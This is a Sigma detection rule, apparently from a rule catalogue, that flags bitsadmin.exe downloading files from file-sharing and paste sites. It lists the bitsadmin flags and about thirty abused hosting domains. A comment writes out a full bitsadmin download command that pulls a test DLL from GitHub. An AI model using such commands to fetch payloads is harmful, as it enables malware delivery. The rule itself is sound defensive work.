Suspicious Download From File-Sharing Website Via Bitsadmin

 1title: Suspicious Download From File-Sharing Website Via Bitsadmin
 2id: 8518ed3d-f7c9-4601-a26c-f361a4256a0c
 3status: test
 4description: Detects usage of bitsadmin downloading a file from a suspicious domain
 5references:
 6    - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin
 7    - https://isc.sans.edu/diary/22264
 8    - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/
 9    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker
10    - https://www.cisa.gov/uscert/ncas/alerts/aa22-321a
11    - https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/
12author: Florian Roth (Nextron Systems)
13date: 2022-06-28
14modified: 2025-12-10
15tags:
16    - attack.persistence
17    - attack.execution
18    - attack.stealth
19    - attack.t1197
20    - attack.s0190
21    - attack.t1036.003
22    - attack.command-and-control
23    - attack.t1105
24logsource:
25    category: process_creation
26    product: windows
27detection:
28    selection_img:
29        - Image|endswith: '\bitsadmin.exe'
30        - OriginalFileName: 'bitsadmin.exe'
31    selection_flags:
32        CommandLine|contains:
33            - ' /transfer '
34            - ' /create '
35            - ' /addfile '
36    selection_domain:
37        CommandLine|contains:
38            - '.githubusercontent.com'       # Includes both gists and github repositories / Michael Haag (idea)
39            - 'anonfiles.com'
40            - 'cdn.discordapp.com'
41            - 'ddns.net'
42            - 'dl.dropboxusercontent.com'
43            - 'ghostbin.co'
44            - 'github.com' # bitsadmin /transfer n https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll %PUBLIC%\calc.dll
45            - 'glitch.me'
46            - 'gofile.io'
47            - 'hastebin.com'
48            - 'mediafire.com'
49            - 'mega.nz'
50            - 'onrender.com'
51            - 'pages.dev'
52            - 'paste.ee'
53            - 'pastebin.com'
54            - 'pastebin.pl'
55            - 'pastetext.net'
56            - 'privatlab.com'
57            - 'privatlab.net'
58            - 'send.exploit.in'
59            - 'sendspace.com'
60            - 'storage.googleapis.com'
61            - 'storjshare.io'
62            - 'supabase.co'
63            - 'temp.sh'
64            - 'transfer.sh'
65            - 'trycloudflare.com'
66            - 'ufile.io'
67            - 'w3spaces.com'
68            - 'workers.dev'
69    condition: all of selection_*
70falsepositives:
71    - Some legitimate apps use this, but limited.
72level: high
73regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains/info.yml
74simulation:
75    - type: atomic-red-team
76      name: Windows - BITSAdmin BITS Download
77      technique: T1105
78      atomic_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b

References

• https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin

  
  Read More

• https://isc.sans.edu/diary/22264

  
  Read More

• https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/

  
  Read More

• https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker

  
  Read More

• https://www.cisa.gov/uscert/ncas/alerts/aa22-321a

  
  Read More

• https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/

  
  Read More

Related rules

• File Download Via Bitsadmin
• File Download Via Bitsadmin To A Suspicious Target Folder
• File With Suspicious Extension Downloaded Via Bitsadmin
• Bitsadmin to Uncommon IP Server Address
• Bitsadmin to Uncommon TLD